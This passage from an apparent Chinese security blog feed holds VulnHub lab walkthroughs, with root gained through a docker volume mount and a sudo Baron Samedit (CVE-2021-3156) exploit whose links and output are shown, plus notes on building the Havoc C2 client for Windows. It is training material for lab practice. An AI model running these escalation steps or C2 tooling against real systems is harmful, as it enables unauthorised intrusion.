groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)</span><br><span class="line"></span><br><span class="line"># # exit</span><br><span class="line">recon@hacknos:~$ docker run -it -v /:/mbt e7d92cdc71fe</span><br><span class="line">Unable to find image 'e7d92cdc71fe:latest' locally</span><br><span class="line">docker: Error response from daemon: pull access denied for e7d92cdc71fe, repository does not exist or may require 'docker login': denied: requested access to the resource is denied.</span><br><span class="line">See 'docker run --help'.</span><br><span class="line">recon@hacknos:~$ docker iamges</span><br><span class="line">docker: 'iamges' is not a docker command.</span><br><span class="line">See 'docker --help'</span><br><span class="line">recon@hacknos:~$ docker images</span><br><span class="line">REPOSITORY TAG IMAGE ID CREATED SIZE</span><br><span class="line">alpine latest 14119a10abf4 2 weeks ago 5.6MB</span><br><span class="line">recon@hacknos:~$ docker run -it -v /:/mbt 14119a10abf4</span><br><span class="line">/ # id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)</span><br><span class="line">/ # ls</span><br><span class="line">bin dev etc home lib mbt media mnt opt proc root run sbin srv sys tmp usr var</span><br><span class="line">/ # cd root/</span><br><span class="line">~ # ls</span><br><span class="line">~ # cd ..</span><br><span class="line">/ # cd /mbt</span><br><span class="line">/mbt # ls</span><br><span class="line">bin dev initrd.img lib32 lost+found opt run srv usr vmlinuz.old</span><br><span class="line">boot etc initrd.img.old lib64 media proc sbin sys var</span><br><span class="line">cdrom home lib libx32 mnt root snap tmp vmlinuz</span><br><span class="line">/mbt # cd root</span><br><span class="line">/mbt/root # ls</span><br><span class="line">root.txt snap</span><br><span class="line">/mbt/root # cat root</span><br><span class="line">cat: can't open 'root': No such file or directory</span><br><span class="line">/mbt/root # cat root.txt</span><br><span class="line"> $$\ $$$$$$$\ </span><br><span class="line"> \$$\ $$ __$$\ </span><br><span class="line">$$$$\ \$$\ $$ | $$ | $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ </span><br><span class="line">\____| \$$\ $$$$$$$ |$$ __$$\ $$ _____|$$ __$$\ $$ __$$\ </span><br><span class="line">$$$$\ $$ | $$ __$$< $$$$$$$$ |$$ / $$ / $$ |$$ | $$ |</span><br><span class="line">\____|$$ / $$ | $$ |$$ ____|$$ | $$ | $$ |$$ | $$ |</span><br><span class="line"> $$ / $$ | $$ |\$$$$$$$\ \$$$$$$$\ \$$$$$$ |$$ | $$ |</span><br><span class="line"> \__/ \__| \__| \_______| \_______| \______/ \__| \__|</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">MD5HASH: bae11ce4f67af91fa58576c1da2aad4b</span><br><span class="line"></span><br><span class="line">Author: Rahul Gehlaut</span><br><span class="line"></span><br><span class="line">WebBlog: www.hackNos.com</span><br><span class="line"></span><br><span class="line">Twitter: @rahul_gehlaut</span><br><span class="line">/mbt/root # </span><br></pre></td></tr></table></figure><h3 id="在www-data身份的提权(CVE-2021-3156)"><a href="#在www-data身份的提权(CVE-2021-3156)" class="headerlink" title="在www-data身份的提权(CVE-2021-3156)"></a>在www-data身份的提权(CVE-2021-3156)</h3><p>使用<a href="https://github.com/mzet-/linux-exploit-suggester%E8%BF%9B%E8%A1%8C%E6%9F%A5%E6%89%BE%E7%9B%B8%E5%85%B3%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F">https://github.com/mzet-/linux-exploit-suggester进行查找相关提权方式</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">www-data@hacknos:/var/www/recon/5ecure$ ./exp.sh</span><br><span class="line">./exp.sh</span><br><span class="line"></span><br><span class="line">Available information:</span><br><span class="line"></span><br><span class="line">Kernel version: 5.3.0</span><br><span class="line">Architecture: x86_64</span><br><span class="line">Distribution: ubuntu</span><br><span class="line">Distribution version: 19.10</span><br><span class="line">Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed</span><br><span class="line">Package listing: from current OS</span><br><span class="line"></span><br><span class="line">Searching among:</span><br><span class="line"></span><br><span class="line">78 kernel space exploits</span><br><span class="line">48 user space exploits</span><br><span class="line"></span><br><span class="line">Possible Exploits:</span><br><span class="line"></span><br><span class="line">[+] [CVE-2021-3156] sudo Baron Samedit 2</span><br><span class="line"></span><br><span class="line"> Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt</span><br><span class="line"> Exposure: probable</span><br><span class="line"> Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10</span><br><span class="line"> Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main</span><br><span class="line"></span><br><span class="line">[+] [CVE-2021-3156] sudo Baron Samedit</span><br><span class="line"></span><br><span class="line"> Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt</span><br><span class="line"> Exposure: less probable</span><br><span class="line"> Tags: mint=19,ubuntu=18|20, debian=10</span><br><span class="line"> Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main</span><br><span class="line"></span><br><span class="line">[+] [CVE-2021-22555] Netfilter heap out-of-bounds write</span><br><span class="line"></span><br><span class="line"> Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html</span><br><span class="line"> Exposure: less probable</span><br><span class="line"> Tags: ubuntu=20.04{kernel:5.8.0-*}</span><br><span class="line"> Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c</span><br><span class="line"> ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c</span><br><span class="line"> Comments: ip_tables kernel module must be loaded</span><br><span class="line"></span><br><span class="line">[+] [CVE-2019-18634] sudo pwfeedback</span><br><span class="line"></span><br><span class="line"> Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/</span><br><span class="line"> Exposure: less probable</span><br><span class="line"> Tags: mint=19</span><br><span class="line"> Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c</span><br><span class="line"> Comments: sudo configuration requires pwfeedback to be enabled.</span><br><span class="line"></span><br><span class="line">[+] [CVE-2017-5618] setuid screen v4.5.0 LPE</span><br><span class="line"></span><br><span class="line"> Details: https://seclists.org/oss-sec/2017/q1/184</span><br><span class="line"> Exposure: less probable</span><br><span class="line"> Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>这里使用<a href="https://github.com/worawit/CVE-2021-3156">worawit/CVE-2021-3156: Sudo Baron Samedit Exploit (github.com)</a></p><p>查看README.md</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">For Linux distribution that glibc has no tcache support:</span><br><span class="line"></span><br><span class="line">if a target is Debian 9, Ubuntu 16.04, or Ubuntu 14.04, try exploit_nss_xxx.py for specific version first</span><br><span class="line">next, try exploit_defaults_mailer.py. If you know a target sudo is compiled with --disable-root-mailer, you can skip this exploit. The exploit attempt to check root mailer flag from sudo binary. But sudo permission on some Linux distribution is 4711 (-rws--x--x) which is impossible to check on target system. (Known work OS is CentOS 6 and 7)</span><br><span class="line">last, try exploit_userspec.py</span><br></pre></td></tr></table></figure><p>然我们先尝试<code>exploit_nss.py</code>,提权成功,获取root权限</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">www-data@hacknos:/var/www/recon/5ecure$ ./exploit_nss.py</span><br><span class="line">./exploit_nss.py</span><br><span class="line"># id</span><br><span class="line">id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root),33(www-data)</span><br><span class="line"># cat /root/root.txt</span><br><span class="line">cat /root/root.txt</span><br><span class="line"> $$\ $$$$$$$\ </span><br><span class="line"> \$$\ $$ __$$\ </span><br><span class="line">$$$$\ \$$\ $$ | $$ | $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ </span><br><span class="line">\____| \$$\ $$$$$$$ |$$ __$$\ $$ _____|$$ __$$\ $$ __$$\ </span><br><span class="line">$$$$\ $$ | $$ __$$< $$$$$$$$ |$$ / $$ / $$ |$$ | $$ |</span><br><span class="line">\____|$$ / $$ | $$ |$$ ____|$$ | $$ | $$ |$$ | $$ |</span><br><span class="line"> $$ / $$ | $$ |\$$$$$$$\ \$$$$$$$\ \$$$$$$ |$$ | $$ |</span><br><span class="line"> \__/ \__| \__| \_______| \_______| \______/ \__| \__|</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">MD5HASH: bae11ce4f67af91fa58576c1da2aad4b</span><br><span class="line"></span><br><span class="line">Author: Rahul Gehlaut</span><br><span class="line"></span><br><span class="line">WebBlog: www.hackNos.com</span><br><span class="line"></span><br><span class="line">Twitter: @rahul_gehlaut</span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h1><p>若是webshell无法直接连接,可以尝试用msf进行反弹。meterpreter传输文件也比较方便。</p>]]></content>
<categories>
<category> Vulnhub </category>
</categories>
<tags>
<tag> 渗透测试 </tag>
<tag> 提权 </tag>
<tag> Linux </tag>
</tags>
</entry>
<entry>
<title>Havoc-Windows-Client</title>
<link href="/2023/10/21/Havoc-Windows-Client/"/>
<url>/2023/10/21/Havoc-Windows-Client/</url>
<content type="html"><![CDATA[<h1 id="Havoc-win"><a href="#Havoc-win" class="headerlink" title="Havoc-win"></a>Havoc-win</h1><h2 id="1-简介"><a href="#1-简介" class="headerlink" title="1.简介"></a>1.简介</h2><p>原项目地址:<a href="https://github.com/HavocFramework/Havoc">Havoc</a></p><p>由于个人更喜欢在windows上使用客户端,故尝试编译。</p><h2 id="2、进行编译"><a href="#2、进行编译" class="headerlink" title="2、进行编译"></a>2、进行编译</h2><h3 id="2-1、准备编译环境"><a href="#2-1、准备编译环境" class="headerlink" title="2.1、准备编译环境"></a>2.1、准备编译环境</h3><p>选择更适合在windows编译linux项目的MSYS2</p><p><a href="https://www.msys2.org/">MSYS2</a></p><p>Client 是用 Qt5 编写的,工程用 cmake 进行构建,没有使用 linux 系统原生的系统特性,可以进行移植。</p><p>编译需求:</p><ul><li>python 3.10</li><li>c++20</li><li>Qt 5</li><li>spdlog</li></ul><p>这里使用 msys2 在Windows 构建编译环境:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">#安装需要的包</span><br><span class="line">pacman -S --needed --noconfirm python python-devel mingw-w64-x86_64-qt-creator mingw-w64-x86_64-qt5-static mingw-w64-x86_64-spdlog mingw-w64-x86_64-cmake base-devel mingw-w64-x86_64-toolchain git subversion mercurial mingw-w64-x86_64-nasm mingw-w64-x86_64-lld mingw-w64-x86_64-python3-pkgconfig autoconf automake</span><br><span class="line"></span><br><span class="line">#mingw-w64-x86_64-pkg-config 和mingw-w64-x86_64-pkgconf 二选一</span><br><span class="line"># 选择使用mingw-w64-x86_64-pkg-config</span><br><span class="line">pacman -S mingw-w64-x86_64-pkg-config</span><br><span class="line"># 选择使用mingw-w64-x86_64-pkgconf 安装可能会自带这个</span><br><span class="line">pacman -S mingw-w64-x86_64-pkg-config</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="2-2、error-Python-h-No-such-file-or-directory"><a href="#2-2、error-Python-h-No-such-file-or-directory" class="headerlink" title="2.2、error: Python.h: No such file or directory"></a>2.2、error: Python.h: No such file or directory</h3><p>python-devel 已经安装:</p><blockquote><p>pacman -S python-devel</p></blockquote><p>搜索 Python.h 也能找到:</p><blockquote><p>$ find / -name “Python.h”<br>/mingw64/include/python3.10/Python.h<br>/usr/include/python3.10/Python.h</p></blockquote><p>修改 CMakeLists.txt 的 line40-line49,添加 Python.h 文件路径(添加上面搜索到的两个路径无效,需要设置绝对路径):</p><figure class="highlight cmake"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(APPLE)</span><br><span class="line"></span><br><span class="line"><span class="keyword">execute_process</span>(<span class="keyword">COMMAND</span> brew --prefix OUTPUT_VARIABLE BREW_PREFIX) <span class="comment">#this because brew install location differs Intel/Apple Silicon macs</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">string</span>(STRIP <span class="variable">${BREW_PREFIX}</span> BREW_PREFIX) <span class="comment">#for some reason this happens: https://gitlab.kitware.com/cmake/cmake/-/issues/22404</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include_directories</span>( <span class="string">"${BREW_PREFIX}/bin/python3.10"</span> )</span><br><span class="line"></span><br><span class="line"><span class="keyword">include_directories</span>( <span class="string">"${BREW_PREFIX}/Frameworks/Python.framework/Headers"</span> )</span><br><span class="line"></span><br><span class="line"><span class="keyword">elseif</span>(UNIX)</span><br><span class="line"></span><br><span class="line"><span class="keyword">include_directories</span>( <span class="variable">${PYTHON_INCLUDE_DIRS}</span> )</span><br><span class="line"></span><br><span class="line"><span class="keyword">else</span>()</span><br><span class="line"></span><br><span class="line"><span class="keyword">include_directories</span>( <span class="string">"C:/msys64/mingw64/include/python3.10/"</span> )</span><br><span class="line"></span><br><span class="line"><span class="keyword">endif</span>()</span><br></pre></td></tr></table></figure><h3 id="2-3、error-filesystem"><a href="#2-3、error-filesystem" class="headerlink" title="2.3、error: filesystem"></a>2.3、error: filesystem</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">error: no match for 'operator=' (operand types are 'std::__cxx11::basic_string<char>' and 'std::filesystem::__cxx11::path')</span><br></pre></td></tr></table></figure><p>C++17 中增加了对文件系统的支持。在这之前,C++ 程序员只能使用 POSIX 接口或者 WindowsAPI 去做一些目录操作。</p><ul><li>编译器版本要求:gcc>=8,clang>=7,MSVC>=19.14</li><li>头文件为:#include “filesystem”,命名空间为:std::filesystem</li><li>官方文档:<a href="https://en.cppreference.com/w/cpp/filesystem">https://en.cppreference.com/w/cpp/filesystem</a></li></ul><p>这里 gcc 的版本是 12.2.0,完全满足要求:</p><blockquote><p>gcc -v<br>gcc version 12.2.0 (Rev10, Built by MSYS2 project)</p></blockquote><p>这里在client\Source\Havoc\Demon\ConsoleInput.cpp作以下修改:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 首先添加头文件</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> _WIN32</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><direct.h></span></span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">//有三处需要更改,可直接搜索Command.Path.empty()即可找到</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> ( ! Command.Path.empty() )</span><br><span class="line"> {</span><br><span class="line"> Path = <span class="built_in">std</span>::filesystem::current_path();</span><br><span class="line"> spdlog::debug( <span class="string">"Set current path to {}"</span>, Command.Path );</span><br><span class="line"> <span class="built_in">std</span>::filesystem::current_path( Command.Path );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"><span class="comment">//将上述内容更改为如下内容</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ( ! Command.Path.empty() )</span><br><span class="line">{</span><br><span class="line">spdlog::debug( <span class="string">"Set current path to {}"</span>, Command.Path );</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> _WIN32</span></span><br><span class="line"><span class="type">char</span> cur_path[<span class="number">256</span>]={<span class="number">0</span>};</span><br><span class="line">getcwd(cur_path,<span class="number">256</span>);</span><br><span class="line">Path = cur_path;</span><br><span class="line">chdir(Command.Path.c_str());</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line">Path = <span class="built_in">std</span>::filesystem::current_path();</span><br><span class="line"><span class="built_in">std</span>::filesystem::current_path( Command.Path );</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="2-4、link-error-undefined"><a href="#2-4、link-error-undefined" class="headerlink" title="2.4、link error: undefined"></a>2.4、link error: undefined</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">undefined reference to `PyTuple_New'</span><br></pre></td></tr></table></figure><p>python 相关的函数出现未定义,没有找到 Python_LIBRARIES,CMakeLists.txt line32 作以下修改:</p><figure class="highlight cmake"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(APPLE)</span><br><span class="line"><span class="keyword">find_package</span>(Python <span class="number">3</span> COMPONENTS Interpreter Development REQUIRED)</span><br><span class="line"><span class="keyword">set</span>(PYTHON_MAJOR $ENV{Python_VERSION_MAJOR})</span><br><span class="line"><span class="keyword">set</span>(PYTHON_MINOR $ENV{Python_VERSION_MINOR})</span><br><span class="line"><span class="keyword">set</span>(PYTHONLIBS_VERSION_STRING <span class="variable">${Python_VERSION}</span>)</span><br><span class="line"><span class="keyword">set</span>(PYTHON_INCLUDE_DIR <span class="variable">${Python_INCLUDE_DIRS}</span>)</span><br><span class="line"><span class="keyword">set</span>(PYTHON_LIBRARIES <span class="variable">${Python_LIBRARIES}</span>)</span><br><span class="line"><span class="keyword">message</span>(<span class="string">"Apple - Using Python:${Python_VERSION_MAJOR} - Libraries:${PYTHON_LIBRARIES} - IncludeDirs: ${PYTHON_INCLUDE_DIR}"</span>)</span><br><span class="line"><span class="keyword">elseif</span>(UNIX)</span><br><span class="line"><span class="keyword">find_package</span>(PythonLibs <span class="number">3</span> REQUIRED)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 增加一个else保证包含python库</span></span><br><span class="line"><span class="keyword">else</span>()</span><br><span class="line"><span class="keyword">find_package</span>(PythonLibs <span class="number">3</span> REQUIRED)</span><br><span class="line"><span class="keyword">set</span>(PYTHONLIBS_VERSION_STRING $ENV{PY_VERSION})</span><br><span class="line"><span class="keyword">endif</span>()</span><br></pre></td></tr></table></figure><h3 id="2-5、run-error-Python"><a href="#2-5、run-error-Python" class="headerlink" title="2.5、run error: Python"></a>2.5、run error: Python</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Fatal Python error: init_fs_encoding: failed to get the Python codec of the filesystem encoding</span><br><span class="line">Python runtime state: core initialized</span><br><span class="line">ModuleNotFoundError: No module named 'encodings'</span><br><span class="line">Current thread 0x00005280 (most recent call first):</span><br><span class="line"><no Python frame></span><br></pre></td></tr></table></figure><p>有2个方法进行修改。</p><h4 id="方法1、设置-python-的路径-(不推荐-因为写死python路径会导致可移植性)"><a href="#方法1、设置-python-的路径-(不推荐-因为写死python路径会导致可移植性)" class="headerlink" title="方法1、设置 python 的路径 (不推荐 因为写死python路径会导致可移植性)"></a>方法1、设置 python 的路径 (不推荐 因为写死python路径会导致可移植性)</h4><p>修改 Client/Source/UserInterface/HavocUI.cpp line191:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Init Python Interpreter</span></span><br><span class="line">{</span><br><span class="line"><span class="comment">// set python home path and python lib path</span></span><br><span class="line">Py_SetPythonHome(<span class="string">L"C:\\msys64\\mingw64\\bin"</span>);</span><br><span class="line">Py_SetPath(<span class="string">L"C:\\msys64\\mingw64\\lib\\python3.10"</span>);</span><br><span class="line"></span><br><span class="line">PyImport_AppendInittab( <span class="string">"emb"</span>, emb::PyInit_emb );</span><br><span class="line">PyImport_AppendInittab( <span class="string">"havocui"</span>, PythonAPI::HavocUI::PyInit_HavocUI );</span><br><span class="line">PyImport_AppendInittab( <span class="string">"havoc"</span>, PythonAPI::Havoc::PyInit_Havoc );</span><br><span class="line">Py_Initialize();</span><br><span class="line">PyImport_ImportModule( <span class="string">"emb"</span> );</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> ( <span class="keyword">auto</span>& ScriptPath : dbManager->GetScripts() )</span><br><span class="line">{</span><br><span class="line">Widgets::ScriptManager::AddScript( ScriptPath );</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="方法2、在系统环境变量中添加变量"><a href="#方法2、在系统环境变量中添加变量" class="headerlink" title="方法2、在系统环境变量中添加变量"></a>方法2、在系统环境变量中添加变量</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">PYTHONHOME C:\Program Files\Python310</span><br><span class="line">PYTHONPATH C:\Program Files\Python310\Lib</span><br></pre></td></tr></table></figure><h2 id="3、程序打包发布"><a href="#3、程序打包发布" class="headerlink" title="3、程序打包发布"></a>3、程序打包发布</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">make</span><br><span class="line"></span><br><span class="line">ldd.exe ./Havoc.exe | grep mingw64 | awk -F\> '{print $2}' | sed 's/ (0x.*//' | xargs -I {} cp {} ./</span><br><span class="line"></span><br><span class="line"># Qt 静态链接,这里不再需要打包 Qt 依赖</span><br><span class="line"># windeployqt ./Havoc.exe</span><br></pre></td></tr></table></figure><p>由于Havoc.exe依赖python库,并且需要<code>PYTHONHOME</code>和<code>PYTHONPATH</code>的环境变量,故打包一个python环境在客户端目录,编写一个BAT进行启动。</p><p>Start_Havoc.bat</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line"></span><br><span class="line">REM 获取python3文件夹的绝对路径</span><br><span class="line">for %%I in ("%cd%\python3") do set "PYTHONHOME=%%~fI"</span><br><span class="line"></span><br><span class="line">REM 设置PYTHONPATH环境变量</span><br><span class="line">set "PYTHONPATH=%PYTHONHOME%\lib"</span><br><span class="line"></span><br><span class="line">REM 显示设置的环境变量</span><br><span class="line">echo PYTHONHOME=%PYTHONHOME%</span><br><span class="line">echo PYTHONPATH=%PYTHONPATH%</span><br><span class="line"></span><br><span class="line">havoc.exe</span><br></pre></td></tr></table></figure><p><img src="/2023/10/21/Havoc-Windows-Client/image-20231021155505703.png" alt="image-20231021155505703"></p><p>编写一个vbs去掉cmd黑框</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">set shell=wscript.createObject("wscript.shell") </span><br><span class="line">run=shell.Run("Start_Havoc.bat", 0)</span><br></pre></td></tr></table></figure><h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a href="https://github.com/far-morningstar/Havoc-win">far-morningstar/Havoc-win: Havoc Client build for win64 (github.com)</a></p>]]></content>
<categories>
<category> 工具 </category>
</categories>
<tags>
<tag> 工具开发 </tag>
</tags>
</entry>
<entry>
<title>Os-ByteSec</title>
<link href="/2023/10/21/Os-ByteSec/"/>
<url>/2023/10/21/Os-ByteSec/</url>
<content type="html"><![CDATA[<h1 id="Os-ByteSec"><a href="#Os-ByteSec" class="headerlink" title="Os-ByteSec"></a>Os-ByteSec</h1><p>靶机地址<a href="https://www.vulnhub.com/entry/hacknos-os-bytesec,393/">hackNos: Os-Bytesec ~ VulnHub</a></p><p>目标为 普通用户的<strong>user.txt</strong>和root用户的<strong>root.txt</strong></p><h2 id="靶机配置"><a href="#靶机配置" class="headerlink" title="靶机配置"></a>靶机配置</h2><p>靶机网卡配置参考我之前的<a href="https://blog.csdn.net/witwitwiter/article/details/119889384?spm=1001.2014.3001.5501">Os-hackNos-1_witwitwiter的博客-CSDN博客</a></p><h2 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a>渗透测试</h2><p>使用nmap进行端口扫描</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">└─# nmap -sV 192.168.5.135 </span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 19:34 CST</span><br><span class="line">Nmap scan report for 192.168.5.135 (192.168.5.135)</span><br><span class="line">Host is up (0.00012s latency).</span><br><span class="line">Not shown: 996 closed ports</span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">80/tcp open http Apache httpd 2.4.18 ((Ubuntu))</span><br><span class="line">139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</span><br><span class="line">445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</span><br><span class="line">2525/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">MAC Address: 00:0C:29:13:48:B6 (VMware)</span><br><span class="line">Service Info: Host: NITIN; OS: Linux; CPE: 